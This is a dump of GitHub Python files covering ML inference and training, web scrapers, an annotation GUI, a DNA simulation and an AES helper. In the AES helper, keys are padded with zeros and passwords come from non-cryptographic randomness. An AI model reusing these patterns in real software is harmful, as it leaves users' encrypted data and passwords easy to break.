lambda_handler(testEvent,100)\n\n","repo_name":"eaglecoder1023/Lambda_functions","sub_path":"WOAnswerSubmission/WOAnswerSubmission.py","file_name":"WOAnswerSubmission.py","file_ext":"py","file_size_in_byte":7164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36562306859","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/2/3 16:42\n# @Author : Jclian91\n# @File : ssd_model_predict_using_onnx_runtime_server.py\n# @Place : Yangpu, Shanghai\n# Import some dependency libraries that we are going to need to run the SSD model\n\nimport numpy as np\nimport assets.onnx_ml_pb2 as onnx_ml_pb2\nimport assets.predict_pb2 as predict_pb2\nimport requests\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n# Load the raw image\ninput_shape = (1, 3, 1200, 1200)\nimg = Image.open(\"assets/blueangels.jpg\")\nimg = img.resize((1200, 1200), Image.BILINEAR)\n\n# Preprocess and normalize the image\n\nimg_data = np.array(img)\nimg_data = np.transpose(img_data, [2, 0, 1])\nimg_data = np.expand_dims(img_data, 0)\nmean_vec = np.array([0.485, 0.456, 0.406])\nstddev_vec = np.array([0.229, 0.224, 0.225])\nnorm_img_data = np.zeros(img_data.shape).astype('float32')\nfor i in range(img_data.shape[1]):\n norm_img_data[:, i, :, :] = (img_data[:,i,:,:]/255 - mean_vec[i]) / stddev_vec[i]\n # norm_img_data[:, i, :, :] = img_data[:, i, :, :] / 255\n\n# Create request message to be sent to the ORT server\n\ninput_tensor = onnx_ml_pb2.TensorProto()\ninput_tensor.dims.extend(norm_img_data.shape)\ninput_tensor.data_type = 1\ninput_tensor.raw_data = norm_img_data.tobytes()\n\nrequest_message = predict_pb2.PredictRequest()\n\n# For your model, the inputs name should be something else customized by yourself. Use Netron to find out the input name.\nrequest_message.inputs[\"image\"].data_type = input_tensor.data_type\nrequest_message.inputs[\"image\"].dims.extend(input_tensor.dims)\nrequest_message.inputs[\"image\"].raw_data = input_tensor.raw_data\n\ncontent_type_headers = ['application/x-protobuf', 'application/octet-stream', 'application/vnd.google.protobuf']\n\nfor h in content_type_headers:\n request_headers = {\n 'Content-Type': h,\n 'Accept': 'application/x-protobuf'\n }\n\n# Inference run using ORT server\n# Change the number 9001 to the appropriate port number if you had changed it during ORT Server docker instantiation\n\nPORT_NUMBER = 9001 # Change appropriately if needed based on any changes when invoking the server in the pre-requisites\ninference_url = \"http://192.168.4.193:\" + str(PORT_NUMBER) + \"/v1/models/default/versions/1:predict\"\nresponse = requests.post(inference_url, headers=request_headers, data=request_message.SerializeToString())\n\n# Parse response message\n\nresponse_message = predict_pb2.PredictResponse()\nresponse_message.ParseFromString(response.content)\n\n# For your model, the outputs names should be something else customized by yourself. Use Netron to find out the outputs names.\nbboxes = np.frombuffer(response_message.outputs['bboxes'].raw_data, dtype=np.float32)\nlabels = np.frombuffer(response_message.outputs['labels'].raw_data, dtype=np.int64)\nscores = np.frombuffer(response_message.outputs['scores'].raw_data, dtype=np.float32)\n\nprint('Boxes shape:', response_message.outputs['bboxes'].dims)\nprint('Labels shape:', response_message.outputs['labels'].dims)\nprint('Scores shape:', response_message.outputs['scores'].dims)\n\n# Display image with bounding boxes and appropriate class\n\n# Parse the list of class labels\nclasses = [line.rstrip('\\n') for line in open('assets/coco_classes.txt')]\n\n# Plot the bounding boxes on the image\nplt.figure()\nfig, ax = plt.subplots(1, figsize=(12, 9))\nax.imshow(img)\n\nresized_width = 1200 # we resized the original image, remember ?\nresized_height = 1200\nnum_boxes = 6 # we limit displaying to just 10 boxes to avoid clogging the result image with boxes\n# The results are already sorted based on box confidences, so we just pick top N boxes without sorting\n\nfor c in range(num_boxes):\n base_index = c * 4\n y1, x1, y2, x2 = bboxes[base_index] * resized_height, bboxes[base_index + 1] * resized_width, bboxes[\n base_index + 2] * resized_height, bboxes[base_index + 3] * resized_width\n color = 'blue'\n box_h = (y2 - y1)\n box_w = (x2 - x1)\n bbox = patches.Rectangle((y1, x1), box_h, box_w, linewidth=2, edgecolor=color, facecolor='none')\n ax.add_patch(bbox)\n plt.text(y1, x1, s=classes[labels[c] - 1], color='white', verticalalignment='top', bbox={'color': color, 'pad': 0})\nplt.axis('off')\n\n# Save image\nplt.savefig(\"output/ssd_result.jpg\", bbox_inches='tight', pad_inches=0.0)\nplt.show()\n","repo_name":"percent4/PyTorch_Learning","sub_path":"onnx_model_serving/ssd_model_predict_using_onnx_runtime_server.py","file_name":"ssd_model_predict_using_onnx_runtime_server.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"68"} +{"seq_id":"7648349661","text":"from tkinter import *\r\nfrom PIL import ImageTk, Image\r\nimport os\r\nimport natsort\r\n\r\nroot = Tk()\r\nroot.geometry(\"700x700\")\r\nroot.focus_set()\r\n\r\ninitial_tracklets_dir = \"\"\r\nmaster_list = []\r\ncurrent_image_in_folder_index = 0\r\ncurrent_snmot_index=0\r\ncurrent_folder_index=0\r\nmaster_list_txt_file_dir = \"\" \r\n\r\nsnmot_list=[]\r\ndef create_snmot_list():\r\n for snmot in os.listdir(initial_tracklets_dir):\r\n snmot_list.append(snmot)\r\ncreate_snmot_list()\r\n\r\nfolder_list=[]\r\ndef folder_list_in_a_snmot(current_snmot_index):\r\n folder_list.clear()\r\n snmot_name = snmot_list[current_snmot_index]\r\n for folder_no in os.listdir(initial_tracklets_dir+'/'+snmot_name):\r\n folder_list.append(folder_no)\r\n\r\ndef images_in_a_folder_of_a_snmot(current_folder_index, current_snmot_index):\r\n master_list.clear()\r\n snmot_name = snmot_list[current_snmot_index]\r\n folder_name = folder_list[current_folder_index]\r\n for folder_no in os.listdir(initial_tracklets_dir+'/'+snmot_name):\r\n for image in os.listdir(initial_tracklets_dir+'/'+snmot_name+'/'+folder_name):\r\n temp = ImageTk.PhotoImage(Image.open(initial_tracklets_dir+'/'+snmot_name+'/'+\r\n folder_name+'/'+image))\r\n master_list.append(temp)\r\n break\r\n\r\n##===== Initialization ========\r\nfolder_list_in_a_snmot(0)\r\nprint(folder_list)\r\nimages_in_a_folder_of_a_snmot(0, 0)\r\n##print(master_list)\r\n\r\nlabel = Label(image=master_list[0])\r\nlabel.grid(row=1, column=0, columnspan=3)\r\n##===== Initialization ========\r\n\r\ndef display_img(img_no):\r\n global label\r\n label = Label(image=master_list[img_no])\r\n label.grid(row=1, column=0, columnspan=3)\r\n\r\ndef image_forward(event):\r\n global current_image_in_folder_index\r\n \r\n label.grid_forget()\r\n current_image_in_folder_index += 1\r\n display_img(current_image_in_folder_index)\r\n\r\ndef folder_forward():\r\n global current_folder_index\r\n \r\n label.grid_forget()\r\n current_folder_index += 1\r\n images_in_a_folder_of_a_snmot(current_folder_index, current_snmot_index)\r\n display_img(0)\r\n\r\ndef snmot_forward(event):\r\n global current_snmot_index\r\n global current_folder_index\r\n label.grid_forget()\r\n\r\n current_snmot_index += 1\r\n folder_list_in_a_snmot(current_snmot_index)\r\n print(folder_list)\r\n current_folder_index = 0\r\n images_in_a_folder_of_a_snmot(0, current_snmot_index)\r\n display_img(0) \r\n\r\nT = Text(root, height = 2, width = 10)\r\n\r\ndef jersey_entry(event):\r\n jersey_number = T.get(\"1.0\", \"end\")\r\n with open(master_list_txt_file_dir, 'a') as f:\r\n f.write(jersey_number+\"\\n\")\r\n T.delete(\"1.0\", \"end\")\r\n\r\n## if current_snmot_index == len(folder_list):\r\n## snmot_forward()\r\n\r\n folder_forward()\r\n \r\nT.grid()\r\nroot.bind('', image_forward)\r\nroot.bind('', snmot_forward)\r\nroot.bind('', jersey_entry)\r\n\r\nroot.mainloop()","repo_name":"farhankhot/Video-Frame-Annotator","sub_path":"annotate.py","file_name":"annotate.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"21670485818","text":"import glob\nimport json\nimport os\nfrom collections import defaultdict\nfrom typing import DefaultDict\n\nfrom tbparse import SummaryReader\n\nOUTPUT_DIR = \"\"\n\n\n# mypy does not yet support recursive type hints\ndef nested_dict() -> DefaultDict[str, defaultdict]: # type: ignore[type-arg]\n \"\"\"Recursive defaultdict.\n\n Returns:\n a nested dictionary\n \"\"\"\n return defaultdict(nested_dict)\n\n\nif __name__ == \"__main__\":\n metrics = nested_dict()\n\n logs = os.path.join(OUTPUT_DIR, \"logs\", \"*\", \"version_*\", \"events*\")\n for log in glob.iglob(logs):\n hyperparams = log.split(os.sep)[-3]\n reader = SummaryReader(log)\n df = reader.scalars\n\n # Some event logs are for train/val, others are for test\n for split in [\"train\", \"val\", \"test\"]:\n rmse = df.loc[df[\"tag\"] == f\"{split}_RMSE\"]\n mae = df.loc[df[\"tag\"] == f\"{split}_MAE\"]\n if len(rmse):\n metrics[hyperparams][split][\"RMSE\"] = rmse.iloc[-1][\"value\"]\n if len(mae):\n metrics[hyperparams][split][\"MAE\"] = mae.iloc[-1][\"value\"]\n\n print(json.dumps(metrics, sort_keys=True, indent=4))\n","repo_name":"microsoft/torchgeo","sub_path":"experiments/torchgeo/find_optimal_hyperparams.py","file_name":"find_optimal_hyperparams.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":1961,"dataset":"github-code","pt":"68"} +{"seq_id":"25577552102","text":"# From this reousrce - https://www.dataquest.io/blog/web-scraping-beautifulsoup/\nfrom requests import get\nfrom bs4 import BeautifulSoup\n\nurl = 'http://www.imdb.com/search/title?release_date=2017&sort=num_votes,desc&page=1'\nresponse = get(url)\n\nhtml_soup = BeautifulSoup(response.text, 'html.parser')\n\nmovie_containers = html_soup.find_all('div', class_='lister-item mode-advanced')\n\nfirst_movie = movie_containers[0]\nfirst_movie_title = first_movie.h3.a.text\nfirst_movie_year = first_movie.find('span', class_='lister-item-year text-muted unbold').text\nfirst_movie_rating = float(first_movie.strong.text)\nfirst_movie_mscore = int(first_movie.find('span', class_='metascore favorable').text)\nfirst_movie_votes = int(first_movie.find('span', attrs={'name': 'nv'})['data-value'])\n\nprint(\n f'{first_movie_title} released in '\n f'{first_movie_year} with rating of '\n f'{first_movie_rating} and metascore of '\n f'{first_movie_mscore} with '\n f'{first_movie_votes} votes')\n\n# Actual scraping\nnames = []\nyears = []\nimdb_ratings = []\nmetascores = []\nvotes = []\n\nfor container in movie_containers:\n if container.find('div', class_='ratings-metascore') is not None:\n names.append(container.h3.a.text)\n years.append(container.find('span', class_='lister-item-year text-muted unbold').text)\n imdb_ratings.append(float(container.strong.text))\n metascores.append(int(container.find('span', class_='metascore').text))\n votes.append(int(container.find('span', attrs={'name': 'nv'})['data-value']))\n\nimport pandas as pd\n\ntest_df = pd.DataFrame(\n {\n 'movie': names,\n 'year': years,\n 'imdb': imdb_ratings,\n 'metascore': metascores,\n 'votes': votes\n }\n)\n\nprint(test_df.info())\nprint(test_df)\n\n# Save the dataframne\ntest_df.to_csv('./test.csv', index=False)\n\nblock = False\nif block:\n # URL Parameters to be used to hit different pages\n pages = [str(i) for i in range(1, 5)]\n years_url = [str(i) for i in range(2000, 2018)]\n\n # Control the crawl rate. We don't want to overload the server and risk\n # being blocked. To do this we use the time and sleep functions to mimic human\n # navigation behaviour\n from time import sleep, time\n from random import randint\n import os\n\n # Print the text and sleep for a random number of seconds\n # between 1 and 4\n for _ in range(0, 5):\n print('Blah')\n sleep(randint(1, 4))\n\n # Monitor progress\n # 1. Frequency of requests\n # 2. Number of requests\n # 3. Status code of requests\n\n start_time = time()\n requests = 0\n for _ in range(0, 5):\n # Insert rquest here\n requests += 1\n sleep(randint(1, 3))\n elapsed_time = time() - start_time\n print(f'Request: {requests}, Frequency: {requests/elapsed_time}')\n os.system('clear')\n\n\n\n","repo_name":"MOB83/12-days-web-scraper","sub_path":"data/imdb/web_scrape_tutorial.py","file_name":"web_scrape_tutorial.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42129891323","text":"import os\nimport torch\nfrom torch import optim\nimport torch.nn as nn\nimport numpy as np\nimport random\nfrom utils import json_file_to_pyobj\nfrom WideResNet import WideResNet\nfrom utils import adjust_learning_rate\nfrom tqdm import tqdm\n\n\ndef set_seed(seed=42):\n torch.backends.cudnn.deterministic = True\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n\ndef _train_seed(net, loaders, device, dataset, log=False, checkpoint=False, logfile='', checkpointFile=''):\n train_loader, test_loader = loaders\n\n if dataset.lower()=='cifar10':\n epochs = 200\n else:\n epochs=100\n\n epoch_thresholds=[int(x) for x in [0.3*epochs, 0.6*epochs, 0.8*epochs]]\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(net.parameters(), lr=0.1, momentum=0.9, nesterov=True, weight_decay=5e-4)\n\n best_test_set_accuracy = 0\n\n for epoch in tqdm(range(epochs)):\n\n net.train()\n for i, data in enumerate(train_loader, 0):\n inputs, labels = data\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n wrn_outputs = net(inputs)\n outputs = wrn_outputs[0]\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n optimizer = adjust_learning_rate(optimizer, epoch + 1, epoch_thresholds)\n\n if epoch >= epoch_thresholds[-1]:\n with torch.no_grad():\n\n correct = 0\n total = 0\n\n net.eval()\n for data in test_loader:\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n\n wrn_outputs = net(images)\n outputs = wrn_outputs[0]\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n epoch_accuracy = correct / total\n epoch_accuracy = round(100 * epoch_accuracy, 2)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('Accuracy at epoch {} is {}%\\n'.format(epoch + 1, epoch_accuracy))\n\n if epoch_accuracy > best_test_set_accuracy:\n best_test_set_accuracy = epoch_accuracy\n if checkpoint:\n torch.save(net.state_dict(), checkpointFile)\n\n return best_test_set_accuracy\n\n\ndef train(args):\n json_options = json_file_to_pyobj(args.config)\n training_configurations = json_options.training\n\n wrn_depth = training_configurations.wrn_depth\n wrn_width = training_configurations.wrn_width\n dataset = training_configurations.dataset.lower()\n seeds = [int(seed) for seed in training_configurations.seeds]\n log = True if training_configurations.log.lower() == 'True' else False\n\n if log:\n logfile = training_configurations.logfile\n with open(logfile, 'w') as temp:\n temp.write('WideResNet-{}-{} scratch in {}\\n'.format(wrn_depth, wrn_width, training_configurations.dataset))\n else:\n logfile = ''\n\n checkpoint = True if training_configurations.checkpoint.lower() == 'true' else False\n\n if dataset.lower() == 'cifar10':\n\n from utils import cifar10loaders\n loaders = cifar10loaders()\n\n elif dataset.lower() == 'svhn':\n\n from utils import svhnLoaders\n loaders = svhnLoaders()\n else:\n ValueError('Datasets to choose from: CIFAR10 and SVHN')\n\n if torch.cuda.is_available():\n device = torch.device('cuda:0')\n else:\n device = torch.device('cpu')\n\n test_set_accuracies = []\n\n for seed in seeds:\n set_seed(seed)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('------------------- SEED {} -------------------\\n'.format(seed))\n\n strides = [1, 1, 2, 2]\n net = WideResNet(d=wrn_depth, k=wrn_width, n_classes=10, input_features=3, output_features=16, strides=strides)\n net = net.to(device)\n\n checkpointFile = 'wrn-{}-{}-seed-{}-{}-dict.pth'.format(wrn_depth, wrn_width, dataset, seed) if checkpoint else ''\n best_test_set_accuracy = _train_seed(net, loaders, device, dataset, log, checkpoint, logfile, checkpointFile)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('Best test set accuracy of seed {} is {}\\n'.format(seed, best_test_set_accuracy))\n\n test_set_accuracies.append(best_test_set_accuracy)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('Best test set accuracy of seed {} is {}\\n'.format(seed, best_test_set_accuracy))\n\n mean_test_set_accuracy, std_test_set_accuracy = np.mean(test_set_accuracies), np.std(test_set_accuracies)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('Mean test set accuracy is {} with standard deviation equal to {}\\n'.format(mean_test_set_accuracy, std_test_set_accuracy))\n\n\nif __name__ == '__main__':\n import argparse\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3\"\n\n parser = argparse.ArgumentParser(description='WideResNet Scratches')\n\n parser.add_argument('-config', '--config', help='Training Configurations', required=True)\n\n args = parser.parse_args()\n\n train(args)\n","repo_name":"AlexandrosFerles/NIPS_2019_Reproducibilty_Challenge_Zero-shot_Knowledge_Transfer_via_Adversarial_Belief_Matching","sub_path":"src/PyTorch/train_scratches.py","file_name":"train_scratches.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"41990856102","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport decimal\nimport random\n\n# seq = [\"ACGT\" for i in range(160)]\n# seq = list(\"\".join(seq))\n# random.seed(10)\n# random.shuffle(seq) #random sequence\nseq = \"gttcaaggttacccatctcaagtagcctagcaacatttgcaacatcccaatggccctgtccttttctttactgatggccgtgctggtgctcagctacaaatccatctgttctctaggctgtgatctgcctcagacccacagcctgg\\\ngtaataggagggccttgatactcctggcacaaatgggaagaatctctcctttctcctgcctgaaggacagacatgactttggacttccccaggaggagtttgatggcaaccagttccagaagactcaagccatctctgtcctccatgagatgat\\\nccagcagaccttcaatctcttcagcacagaggactcatctgctgcttgggaacagagcctcctagaaaaattttccactgaactttaccagcaactgaataacctggaagcatgtgtgatacaggaggttgggatggaagagactcccctgatg\\\naatgaggactccatcctggctgtgaggaaatacttccaaagaatcactctttatctaacagagaagaaatacagcccttgtgcctgggaggttgtcagagcagaaatcatgagatctctctctttttcaacaaacttgcaaaaaatattaagga\\\nggaaggattgaaaactggttcaacatggcaatgatcctgattgactaatacattatctcacactttcatgagttcctccatttcaaagactcacttctataaccaccacgagttgaatcaaaattttcaaatgttttcagcagtgtaaagaagc\\\ngtcgtgtatacctgtgcaggcactagtactttacagatgaccatgctgatgtctctgttcatctatttatttaaatatttatttaattatttttaagatttaaattatttttttatgtaatatcatgtgtacctttacattgtggtgaatgtaac\\\naatatatgttcttcatatttagccaatatattaatttcctttttcattaaatttttactatac\".upper() #real sequence\n\ndx = 900\nR = {\"A\": 5.8, \"T\": 4.8, \"G\": 5.7, \"C\": 4.7}\nV = {\"A\": 2.09, \"T\": 1.43, \"G\": 3.12, \"C\": 2.12}\nI = {\"A\": 7.61, \"T\": 4.86, \"G\": 8.22, \"C\": 4.11}\n\n\ndef in_cond(x):\n return 4 * math.atan(decimal.Decimal(-x + 10 + dx).exp()) - 4 * math.atan(decimal.Decimal(-x + dx).exp())\n\n\nf_llist = np.array([in_cond(i) for i in range(len(seq))])\n\ndf_llist = np.zeros(len(f_llist))\n\nff_list = np.array(list(zip(f_llist, df_llist)))\n\nXX = np.arange(len(ff_list))\n\n\ndef F(x, base):\n lst = []\n lst.clear()\n for i in range(len(x)):\n if i == 0:\n xx0 = 0\n xx1 = x[i, 0]\n xx2 = x[i + 1, 0]\n elif i == len(x) - 1:\n xx0 = x[i - 1, 0]\n xx1 = x[i, 0]\n xx2 = 0\n else:\n xx0 = x[i - 1, 0]\n xx1 = x[i, 0]\n xx2 = x[i + 1, 0]\n f = (((xx2 - xx1) / 0.65) * R[base] - 0.5 * np.sin(xx1)) * V[base] * 10 ** -1\n lst.append(f)\n x1 = list(x[:, 1])\n return np.array(list(zip(x1, lst)))\n\n\ndef RK4(x, base):\n h = XX[1] - XX[0]\n k1 = h * F(x, base)\n k2 = h * F(x + k1 / 2, base)\n k3 = h * F(x + k2 / 2, base)\n k4 = h * F(x + k3, base)\n X2 = x + ((k1 + 2 * k2 + 2 * k3 + k4) / 6)\n return X2\n\n\nres = RK4(ff_list, seq[1])\n\nress = list(res[:, 0])\nplt.ion()\nfig, ax = plt.subplots()\nfig.set_figwidth(10)\nline, = ax.plot(XX, ress)\nfor i in seq:\n res[:, 1] = 0\n res = RK4(res, i)\n ress = list(res[:, 0])\n ress.reverse()\n line.set_ydata(ress)\n fig.canvas.draw()\n fig.canvas.flush_events()\n\nplt.ioff()\nplt.show()\n","repo_name":"IlDezmond/physics_algorithm","sub_path":"singord_ifna17.py","file_name":"singord_ifna17.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42899317471","text":"import requests\r\nimport parsel\r\nimport re\r\nimport csv\r\n\r\n\"\"\"\r\n查询参数:\r\n'ssdm': 'xx' 选择省市\r\ndwmc:xx 直接选择单位\r\n'mldm': 'xx' 门类 专科:zyxw\r\n'yjxkdm': 'xxxx' 学科类别\r\nzymc: 选择专业\r\nxxfs: 1 全日制 2 非全日制\r\n\"\"\"\r\nfirst_post_page = 0\r\nwith open('data.csv', mode='w', encoding='utf-8', newline='') as file:\r\n csv_writer = csv.writer(file)\r\n csv_writer.writerow(\r\n ['招生单位', '所在地', '研究生院', '自划线院校', '博士点',\r\n '考试方式', '院系所', '专业', '研究方向', '学习方式', '指导教师', '拟招生人数', '跨专业', '备注',\r\n '政治', '考试大纲', '英语', '考试大纲', '数学', '考试大纲', '专业课', '考试大纲',\r\n '政治', '考试大纲', '英语', '考试大纲', '数学', '考试大纲', '专业课', '考试大纲', ])\r\n\r\nurl = 'https://yz.chsi.com.cn/zsml/queryAction.do'\r\n\r\ndata = {\r\n 'ssdm': '11',\r\n 'dwmc': '',\r\n 'mldm': '08',\r\n 'mlmc': '',\r\n 'yjxkdm': '0812',\r\n 'zymc': '',\r\n 'xxfs': '1',\r\n 'pageno': str(first_post_page),\r\n}\r\n\r\nheaders = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'\r\n}\r\n\r\nresponse = requests.post(url=url, data=data, headers=headers)\r\nhtml_data = response.text\r\nselector = parsel.Selector(html_data)\r\n\r\nmax_page_num = int(selector.css('.zsml-page-box li:nth-last-child(3) a::text').get())\r\nprint(max_page_num)\r\n\r\nfor page in range(1, max_page_num + 1):\r\n print(page)\r\n data = {\r\n 'ssdm': '',\r\n 'dwmc': '',\r\n 'mldm': '08',\r\n 'mlmc': '',\r\n 'yjxkdm': '0801',\r\n 'zymc': '',\r\n 'xxfs': '',\r\n 'pageno': str(page),\r\n }\r\n response = requests.post(url=url, data=data, headers=headers)\r\n html_data = response.text\r\n selector = parsel.Selector(html_data)\r\n trs = selector.css('.ch-table tbody tr')\r\n\r\n for tr in trs:\r\n temp_writer = []\r\n temp_all = []\r\n school = tr.css('a::text').get()\r\n school_url = 'https://yz.chsi.com.cn/' + tr.css('a::attr(href)').get()\r\n city = tr.css('td:nth-child(2)::text').get()\r\n statue_1 = tr.css('td:nth-child(3) i::text').get()\r\n if not statue_1:\r\n statue_1 = ''\r\n else:\r\n statue_1 = '是'\r\n statue_2 = tr.css('td:nth-child(4) i::text').get()\r\n if not statue_2:\r\n statue_2 = ''\r\n else:\r\n statue_2 = '是'\r\n statue_3 = tr.css('td:nth-child(5) i::text').get()\r\n if not statue_3:\r\n statue_3 = ''\r\n else:\r\n statue_3 = '是'\r\n print(school, city, statue_1, statue_2, statue_3)\r\n\r\n with open('data.csv', mode='a', encoding='utf-8', newline='') as file:\r\n file.write(school + ',' + city + ',' + statue_1 + ',' + statue_2 + ',' + statue_3 + ',')\r\n\r\n temp_subject_Information = []\r\n\r\n response = requests.get(url=school_url, headers=headers)\r\n selector = parsel.Selector(response.text)\r\n trs = selector.css('.ch-table tbody tr')\r\n\r\n extent = selector.css('.ch-table tbody tr td:nth-child(1)::text').getall()\r\n\r\n Number_of_studies = len(extent)\r\n control_number = 1\r\n\r\n for tr in trs:\r\n form = tr.css('td:nth-child(1)::text').get()\r\n faculty = tr.css('td:nth-child(2)::text').get()\r\n speciality = tr.css('td:nth-child(3)::text').get()\r\n Research_Direction = tr.css('td:nth-child(4)::text').get()\r\n Styles = tr.css('td:nth-child(5)::text').get()\r\n teacher = tr.css('td:nth-child(6)::text').get().strip()\r\n people = tr.css('td:nth-child(7) script::text').get()\r\n transdisciplinary = tr.css('td:nth-child(9) a::text').get()\r\n remark = tr.css('td:nth-child(10) script::text').get()\r\n # try:\r\n # people = re.findall(\"专业:.*?',\", people, re.S)[0]\r\n # except:\r\n # try:\r\n # people = re.findall(\"研究方向:.*?,\", people, re.S)[0]\r\n # except:\r\n # try:\r\n # people = re.findall(\"一级学科:.*?,\", people, re.S)[0]\r\n # except:\r\n # people = re.findall(\"院系所:.*?,\", people, re.S)[0]\r\n remark = eval(re.findall(\"cutString(.*?),\", remark, re.S)[0].replace('(', ''))\r\n people: str\r\n people = people.split('cutString')[-1].replace(\"'\", '').split(',')[0].strip(\"(\")\r\n\r\n syllabus_url = 'https://yz.chsi.com.cn/' + tr.css('td:nth-child(8) a::attr(href)').get()\r\n print(form, faculty, speciality, Research_Direction, Styles, teacher, people, transdisciplinary, remark)\r\n\r\n temp_subject_Information.append(\r\n [form, faculty, speciality, Research_Direction, Styles, teacher, people, transdisciplinary, remark])\r\n\r\n response = requests.get(url=syllabus_url, headers=headers)\r\n selector = parsel.Selector(response.text)\r\n tds = selector.css('tbody.zsml-res-items td')\r\n for td in tds:\r\n politics = td.css('::text').get().strip()\r\n detail = td.css('span::text').get()\r\n print(politics, detail)\r\n\r\n temp_subject_Information.append([politics, detail])\r\n\r\n for i in temp_subject_Information:\r\n for k in i:\r\n temp_writer.append(k)\r\n\r\n temp_subject_Information.clear()\r\n\r\n with open('data.csv', mode='a', encoding='utf-8', newline='') as file:\r\n csv_writer = csv.writer(file)\r\n csv_writer.writerow(temp_writer)\r\n\r\n temp_writer.clear()\r\n\r\n # 决定是否写入新行\r\n if Number_of_studies == 1:\r\n pass\r\n else:\r\n if control_number == Number_of_studies:\r\n pass\r\n else:\r\n with open('data.csv', mode='a', encoding='utf-8', newline='') as file:\r\n file.write('' + ',' + '' + ',' + '' + ',' + '' + ',' + '' + ',')\r\n control_number += 1\r\n\r\n print('*' * 100)\r\n","repo_name":"Silfra-glacier/python_yzw_spider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20186307901","text":"from Cryptodome.Cipher import DES,AES\nfrom Cryptodome.Random import get_random_bytes\nimport random\nimport string\n\n#from project.main import decrypt\n\n\ndef make_key(key):\n if(len(key) < 16):\n new_key = key+((16-len(key))*'0')\n elif(len(key) > 16 and len(key) < 24):\n new_key = key+((24-len(key))*'0')\n elif(len(key) > 24 and len(key) < 32):\n new_key = key+((32-len(key))*'0')\n elif(len(key) > 32):\n new_key = key[0:32]\n else:\n new_key = key\n return bytes(new_key,\"utf8\")\n\ndef make_data(data):\n data = bytes(data,'utf8')\n if (len(data) % 16 != 0):\n new_data = (((len(data)//16 + 1)*16) - len(data)) * b'\\x00' + data\n return new_data\n else:\n return data\n\ndef remake_data(data):\n new_data = \"\"\n mark = '¿'\n out_of_range = False\n for ch in data:\n if(ch != 0):\n if(ch >= 33 and ch <=126):\n new_data += chr(ch)\n else:\n new_data += mark\n out_of_range = True\n if out_of_range:\n new_data = 'Error: wrong key'\n return(new_data)\n\n\ndef encrypt_AES(key_str, data_str):\n iv = get_random_bytes(16)\n key = make_key(key_str)\n data = make_data(data_str)\n aes = AES.new(key, AES.MODE_CBC, iv)\n encrypted = aes.encrypt(data)\n print(key, iv, encrypted)\n return [encrypted, iv]\n\ndef decrypt_AES(encrypted, key_str, iv):\n key = make_key(key_str)\n aes = AES.new(key, AES.MODE_CBC, iv)\n decrypted = aes.decrypt(encrypted)\n decrypted_data = remake_data(decrypted)\n print(key, iv, encrypted, decrypted)\n return decrypted_data\n\ndef test(): # przyklad uzycia\n en = encrypt_AES('klucz','Korona123@!!')\n #print(en)\n res = decrypt_AES(en[0], 'klucz',en[1])\n print(res)\n\ndef get_random_password():\n source = string.ascii_letters + string.digits\n result_str = ''.join((random.choice(source) for i in range(16)))\n return result_str\n #print(result_str)\n\n#test()\n#get_random_password()\n\n","repo_name":"BKopysc/flask_secure_app","sub_path":"project/utils/cipher_util.py","file_name":"cipher_util.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72264842456","text":"\"\"\"Module for emeter container.\"\"\"\nimport logging\nfrom typing import Optional\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass EmeterStatus(dict):\n \"\"\"Container for converting different representations of emeter data.\n\n Newer FW/HW versions postfix the variable names with the used units,\n where-as the olders do not have this feature.\n\n This class automatically converts between these two to allow\n backwards and forwards compatibility.\n \"\"\"\n\n @property\n def voltage(self) -> Optional[float]:\n \"\"\"Return voltage in V.\"\"\"\n try:\n return self[\"voltage\"]\n except ValueError:\n return None\n\n @property\n def power(self) -> Optional[float]:\n \"\"\"Return power in W.\"\"\"\n try:\n return self[\"power\"]\n except ValueError:\n return None\n\n @property\n def current(self) -> Optional[float]:\n \"\"\"Return current in A.\"\"\"\n try:\n return self[\"current\"]\n except ValueError:\n return None\n\n @property\n def total(self) -> Optional[float]:\n \"\"\"Return total in kWh.\"\"\"\n try:\n return self[\"total\"]\n except ValueError:\n return None\n\n def __repr__(self):\n return f\"\"\n\n def __getitem__(self, item):\n valid_keys 